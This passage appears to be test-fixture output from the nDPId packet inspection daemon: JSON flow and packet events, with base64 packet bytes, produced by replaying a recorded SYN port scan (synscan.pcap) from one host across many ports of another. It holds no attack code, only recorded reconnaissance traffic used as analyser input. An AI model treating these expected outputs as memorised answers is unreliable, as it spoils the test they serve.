+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMwAAC4GbaasEAAIQA2GNIzTB+XdU4MZAAAAAGACDAAkpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060693,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_packet_id":1,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060693,"pkt":"ACYLMQczACWzv5HuCABFAAAs8uUAACYGL42sEAAIQA2GNIzTBFrdU4MZAAAAAGACDAAoMgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsvn0AAC0GXPWsEAAIQA2GNIzTH0jdU4MZAAAAAGACCAARRAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAIAADgGiHCsEAAIQA2GNIzTBR7dU4MZAAAAAGACBAAvbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsIScAAC0G+kusEAAIQA2GNIzTF3LdU4MZAAAAAGACCAAZGgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsoGcAADIGdgusEAAIQA2GNIzTAlHdU4MZAAAAAGACDAAqOwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAshhwAACcGm1asEAAIQA2GNIzT8czdU4MZAAAAAGACEAA2vwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsU1UAADoGux2sEAAIQA2GNIzTS5bdU4MZAAAAAGACDADg9QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsEgUAADgG\/m2sEAAIQA2GNIzTHz\/dU4MZAAAAAGACBAAVTQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsBjQAADAGEj+sEAAIQA2GNIzTYODdU4MZAAAAAGACBADTqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsG38AADYG9vOsEAAIQA2GNIzTDPvdU4MZAAAAAGACDAAfkQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsV1gAACgGyRqsEAAIQA2GNIzTAZfdU4MZAAAAAGACBAAy9QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsso4AADcGXuSsEAAIQA2GNIzTAJLdU4MZAAAAAGACEAAn+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsJu4AACgG+YSsEAAIQA2GNIzTH1\/dU4MZAAAAAGACBAAVLQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsyyYAADkGREysEAAIQA2GNIzTAtDdU4MZAAAAAGACCAAtvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAssr4AADYGX7SsEAAIQA2GNIzTF9TdU4MZAAAAAGACDAAUuAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsicIAADMGi7CsEAAIQA2GNIzSFrfdUoMYAAAAAGACEAAR2AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsP70AADsGzbWsEAAIQA2GNIzSITTdUoMYAAAAAGACEAAHWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsHbsAACcGA7isEAAIQA2GNIzSBALdUoMYAAAAAGACEAAkjQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/twAADMGFpasEAAIQA2GNIzSPozdUoMYAAAAAGACEADqAgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACsGDU6sEAAIQA2GNIzSnQHdUoMYAAAAAGACEACLjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsdZEAADYGnOGsEAAIQA2GNIzSB5vdUoMYAAAAAGACDAAk9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs38EAADAGOLGsEAAIQA2GNIzSFiLdUoMYAAAAAGACBAAebQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAssGMAACsGbQ+sEAAIQA2GNIzSFGrdUoMYAAAAAGACEAAUJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADUGweWsEAAIQA2GNIzSI1DdUoMYAAAAAGACCAANPwAAAgQFtA=="} 